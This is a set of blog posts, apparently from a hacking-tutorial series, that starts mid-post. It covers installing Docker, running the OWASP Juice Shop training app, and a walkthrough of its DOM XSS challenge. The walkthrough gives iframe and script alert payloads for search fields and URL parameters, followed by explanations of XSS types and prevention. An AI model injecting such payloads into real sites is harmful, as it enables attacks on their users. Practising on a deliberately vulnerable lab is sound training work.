After the download, open the .dmg file and drag Docker to your Applications folder.
Launch Docker from the Applications folder.
Verify Docker is running by opening a terminal and typing:

   docker --version

Installing Docker on Debian-based Linux (Ubuntu/Kali)

Docker is available directly from the official Docker repositories. Here’s how to set it up:

Uninstall old Docker versions (if any):

   sudo apt remove docker docker-engine docker.io containerd runc

Install Docker Engine:

   sudo apt update && sudo apt install docker.io

Verify installation:

   sudo docker --version

Installing Docker Compose (for Linux)

Docker Compose is a tool that helps you define and run multi-container Docker applications. Here’s how to install it:

Install Docker Compose:

   sudo apt install docker-compose

sudo systemctl start docker

sudo systemctl enable docker

Apply executable permissions to the binary:

   sudo chmod +x /usr/local/bin/docker-compose

Verify the installation:

   docker-compose --version

Setting Up Juice Shop

Once Docker is installed, setting up Juice Shop is straightforward. We will use Docker to pull the OWASP Juice Shop image and run it on your system.

Pull the Juice Shop Docker image:

   docker pull bkimminich/juice-shop

Run the Juice Shop container:

   docker run --rm -p 3000:3000 bkimminich/juice-shop

Access Juice Shop: Open your browser and go to http://localhost:3000. You should see the Juice Shop application running.

What’s Next?

Now that you have Juice Shop up and running, it is time to take action and start hacking! I belive the best way to learn is not just by reading or watching but actually doing. In the next post, we’ll start exploring the security challenges built into Juice Shop and go through step-by-step tutorials on how to find and exploit vulnerabilities.

Stay tuned, and get ready to hack the Juice Shop

How to Install Docker on Windows / Mac / Linux

haXarubiX — Sun, 06 Oct 2024 05:07:38 +0000

Step-by-Step Docker Installation and Juice Shop Setup (Updated)

Part 1: Installing Docker

1. Docker Installation on Windows and macOS

Docker Desktop makes it incredibly easy to set up Docker on both Windows and macOS. Here’s a quick guide to get you started.

Steps for both Windows and macOS:

Download Docker Desktop:
- Visit the Docker Desktop website and click “Download for Windows” or “Download for Mac,” depending on your operating system.
Install Docker Desktop:
- On Windows, simply run the installer .exe file and follow the on-screen instructions.
- On macOS, open the downloaded .dmg file and drag Docker to your Applications folder.
Launch Docker Desktop:
- After installation, launch Docker Desktop.
- Docker Desktop will guide you through the initial setup, and within a few clicks, Docker will be up and running.
Verify Docker Installation:
- Open PowerShell (Windows) or Terminal (macOS) and type:
```
 docker --version
```

You should see the installed version of Docker printed in the terminal.

That’s it! Docker is now installed and ready for use. You don’t need to worry about additional steps since Docker Desktop handles everything, including setting up Docker Compose.

2. Docker Installation on Debian-based Linux (Ubuntu/Kali)

For Linux users (particularly Debian-based systems like Ubuntu or Kali), installing Docker is also straightforward.

Update Your System: Open your terminal and run the following to ensure your system is up to date:

   sudo apt update
   sudo apt upgrade

Install Docker: Install Docker using the following command:

   sudo apt install docker.io

Install Docker Compose: Since Docker Compose is often used alongside Docker, install it as well:

   sudo apt install docker-compose

Start and Enable Docker: Enable Docker to start at boot and launch it right away:

   sudo systemctl enable docker
   sudo systemctl start docker

Verify Installation: Run the following command to check if Docker is installed correctly:

   docker --version

That's it for Linux! Docker and Docker Compose are now installed and ready for use.

OWASP JUICE SHOP SET UP WITH DOCKER

haXarubiX — Fri, 04 Oct 2024 05:12:27 +0000

Step-by-Step Docker Installation and Juice Shop Setup

Part 1: Installing Docker

Docker Installation on Windows and macOS

Docker Desktop makes it incredibly easy to set up Docker on both Windows and macOS. Here’s a quick guide to get you started.

Steps for both Windows and macOS:

1. Download Docker Desktop:

Visit the Docker Desktop website and click “Download for Windows” or “Download for Mac,” depending on your operating system.

2. Install Docker Desktop:

On Windows, simply run the installer .exe file and follow the on-screen instructions.

On macOS, open the downloaded .dmg file and drag Docker to your Applications folder.

3. Launch Docker Desktop:

After installation, launch Docker Desktop.

Docker Desktop will guide you through the initial setup, and within a few clicks, Docker will be up and running.

Verify Docker Installation:

Open PowerShell (Windows) or Terminal (macOS) and type:

docker --version

You should see the installed version of Docker printed in the terminal.

That’s it! Docker is now installed and ready for use. You don’t need to worry about additional steps since Docker Desktop handles everything, including setting up Docker Compose.

2. Docker Installation on Debian-based Linux (Ubuntu/Kali)

For Linux users (particularly Debian-based systems like Ubuntu or Kali), installing Docker is also straightforward.

Update Your System: Open your terminal and run the following to ensure your system is up to date:

sudo apt update && sudo apt upgrade

Install Docker: Install Docker using the following command:

sudo apt install docker.io

Install Docker Compose: Since Docker Compose is often used alongside Docker, install it as well:

sudo apt install docker-compose

Start and Enable Docker: Enable Docker to start at boot and launch it right away:

sudo systemctl enable docker

sudo systemctl start docker

Verify Installation: Run the following command to check if Docker is installed correctly:

docker --version

That's it for Linux! Docker and Docker Compose are now installed and ready for use.

Part 2: Pulling and Running Juice Shop with Docker

Now that Docker is installed, let's set up the Juice Shop container.

Steps to Set Up Juice Shop in Docker:

Open Your Terminal (or PowerShell on Windows):
Pull the Juice Shop Docker Image: Run the following command to pull the latest Juice Shop image from Docker Hub:

docker pull bkimminich/juice-shop

Run the Juice Shop Container: Use this command to run the container in the background and make it accessible from your browser:

docker run -d -p 3000:3000 --name juice-shop bkimminich/juice-shop

-d: Runs the container in the background (detached mode).

-p 3000:3000: Exposes port 3000 on your machine and maps it to port 3000 in the container.

--name juice-shop: Names the container "juice-shop."

Access Juice Shop in Your Browser: Open your web browser and navigate to:

Verify Juice Shop is Running: To ensure the container is running, you can check by using:

docker ps

This will list the currently running containers, and you should see "juice-shop" in the list.

Stopping and Restarting Juice Shop:

To stop the Juice Shop container, run:

docker stop juice-shop

To restart it:

docker start juice-shop

Conclusion

With Docker now easily installed and Juice Shop running, you’re ready to explore the various vulnerabilities that Juice Shop presents. The setup is designed to be accessible for all platforms, and you can now start practicing hacking. (this is a great place to start of you are interested in bug bounty "hacking")

In our next post, we’ll start exploring specific challenges in Juice Shop and guide you through solving them.

Hax the rubix leave the cube.

OWASP Juice-Shop Walkthrough Tutorial [ DOM XSS ]

haXarubiX — Fri, 04 Oct 2024 03:46:34 +0000

DOM XSS

Perform a DOM XSS attack with <iframe src="javascript:alert(xss)">.

Step 1: Understand the Challenge

The challenge asks you to perform a DOM-based Cross-Site Scripting (XSS) attack using the provided payload:

HTML

<iframe src="javascript:alert(`xss`)">

DOM XSS occurs when the client-side JavaScript code modifies the DOM based on user input in an unsafe manner, leading to script execution.

Step 2: Identify Potential Injection Points

Explore the Application: Browse through different pages of the OWASP Juice Shop application. Look for places where user input is reflected in the DOM.
Common Targets: Check search fields, feedback forms, user profile updates, and any other areas where user data might be processed.

Step 3: Test the Payload

Locate the Vulnerable Input Field: The exact location can vary based on the version of the Juice Shop. Some common places to try are the search bar, the feedback form, or any parameter in the URL that might be processed by JavaScript.
Inject the Payload: Paste the provided payload <iframe src="javascript:alert(xss)> into the identified input field or parameter.

Step 4: Example Walkthrough (Using Search Bar)

Navigate to the Search Bar: In the OWASP Juice Shop, there is often a search functionality at the top of the page.
Inject the Payload: Enter the following in the search bar:
```
<iframe src="javascript:alert(`xss`)">
```
Submit the Search: Press enter or click the search button.

Step 5: Observe the Results

If the search functionality is vulnerable to DOM XSS, the payload will be executed, and you should see an alert box with the message xss.
If nothing happens, try other input fields or URL parameters.

Step 6: Verify the Challenge Completion

The OWASP Juice Shop application will typically give you a notification or update the challenge progress once you successfully perform the DOM XSS attack.

Troubleshooting Tips

Inspect the Page: Use the browser's developer tools (right-click on the page and select "Inspect") to see how the DOM is being manipulated by JavaScript.
Test Multiple Inputs: If one input doesn't work, try others like the feedback form, product reviews, or user settings.
Check URL Parameters: Sometimes, modifying URL parameters can trigger DOM-based XSS vulnerabilities.

Example Using URL Parameters

Navigate to a Page with URL Parameters: For example, the product details page might have a URL like http://your-juice-shop-url/#/product/1.

Modify the URL Parameter: Append the payload to a parameter in the URL, such as:

http://your-juice-shop-url/#/product/1?query=<iframe src="javascript:alert(`xss`)">

http://your-juice-shop-url/#/product/1?query=<iframe src="javascript:alert(xss)">
Load the Page: Hit enter and see if the alert box appears.

By following these steps, you should be able to find a location in the OWASP Juice Shop where the DOM XSS payload is executed, thus completing the challenge. If you still encounter issues, try looking at the application source code or using a web proxy tool to inspect the requests and responses more thoroughly.

Understanding DOM (Document Object Model)

The Document Object Model (DOM) is a programming interface for web documents. It represents the page so that programs can change the document structure, style, and content. The DOM provides a structured representation of the document as a tree of objects. Each node in this tree represents a part of the document (e.g., an element, attribute, text content).

Key Points:

Structure: The DOM represents the HTML structure as a tree of nodes, with the document as the root node and elements like <div>, <p>, and <a> as child nodes.
Interaction: JavaScript can interact with and modify the DOM to dynamically change the content, style, and structure of a web page.
Dynamic Updates: Changes made to the DOM can update the user interface without needing to reload the page.

Understanding XSS (Cross-Site Scripting)

Cross-Site Scripting (XSS) is a type of security vulnerability typically found in web applications. XSS allows attackers to inject malicious scripts into web pages viewed by other users. These scripts can then execute in the context of the victim's browser, potentially leading to data theft, session hijacking, or other malicious activities.

Types of XSS:

Stored XSS: Also known as persistent XSS, this type occurs when malicious input is stored on the server (e.g., in a database) and then served to users. For example, if a user posts a comment containing a script, and that script is executed when others view the comment.
Reflected XSS: This type occurs when the malicious script is reflected off a web server, such as in an error message or search result, and then executed in the context of the victim's browser. It typically requires the user to click on a malicious link.
DOM-based XSS: Unlike stored and reflected XSS, DOM-based XSS occurs entirely on the client side. It happens when the web application's client-side scripts process data from an untrusted source in an unsafe way, modifying the DOM and executing malicious code.

Detailed Explanation of Each XSS Type

Stored XSS

How It Works:
- Attacker submits malicious code to a website where the input is stored (e.g., comment section, user profile, message board).
- The website later displays this input to other users, embedding the malicious script in the web page.
- When users view the affected page, the script executes in their browsers.
Example:
- Attacker submits a comment: <script>alert('XSS')</script>
- The comment is stored in the database.
- When other users load the page with the comment, the script runs, showing an alert.

Reflected XSS

How It Works:
- Attacker crafts a malicious URL containing a script.
- Victim clicks the URL.
- The server processes the input and reflects it back in the response (e.g., in a search result or error message).
- The script executes in the victim's browser.
Example:
- Malicious URL: http://example.com/search?q=<script>alert('XSS')</script>
- The server includes the q parameter value in the response page.
- When the victim visits the URL, the script runs, showing an alert.

DOM-based XSS

How It Works:
- Client-side JavaScript code dynamically updates the DOM based on user input or URL parameters.
- If the input is not properly sanitized, it can lead to script execution.
Example:
- URL: http://example.com/#<script>alert('XSS')</script>
- JavaScript on the page reads the fragment identifier (part after #) and writes it to the DOM without sanitization.
- The script executes, showing an alert.

Preventing XSS

Sanitize Input: Always validate and sanitize user inputs both on the client side and server side.
Escape Output: Properly escape user-supplied data before including it in HTML, JavaScript, or other outputs.
Content Security Policy (CSP): Use CSP headers to restrict sources from which scripts can be loaded.
Use Security Libraries: Utilize libraries and frameworks that automatically handle escaping and sanitization.

By understanding the types of XSS and how they can be exploited, you can better protect your web applications from these vulnerabilities. Implementing robust input validation and output escaping practices are crucial steps in securing applications against XSS attacks.